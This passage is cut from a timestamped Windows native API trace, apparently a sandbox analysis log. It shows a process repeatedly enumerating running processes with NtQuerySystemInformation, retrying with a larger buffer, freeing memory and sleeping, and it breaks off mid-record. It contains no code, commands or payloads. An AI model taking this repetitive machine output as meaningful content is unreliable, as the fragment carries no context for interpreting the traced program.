BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.304] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.340] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.347] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.354] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.383] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.447] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 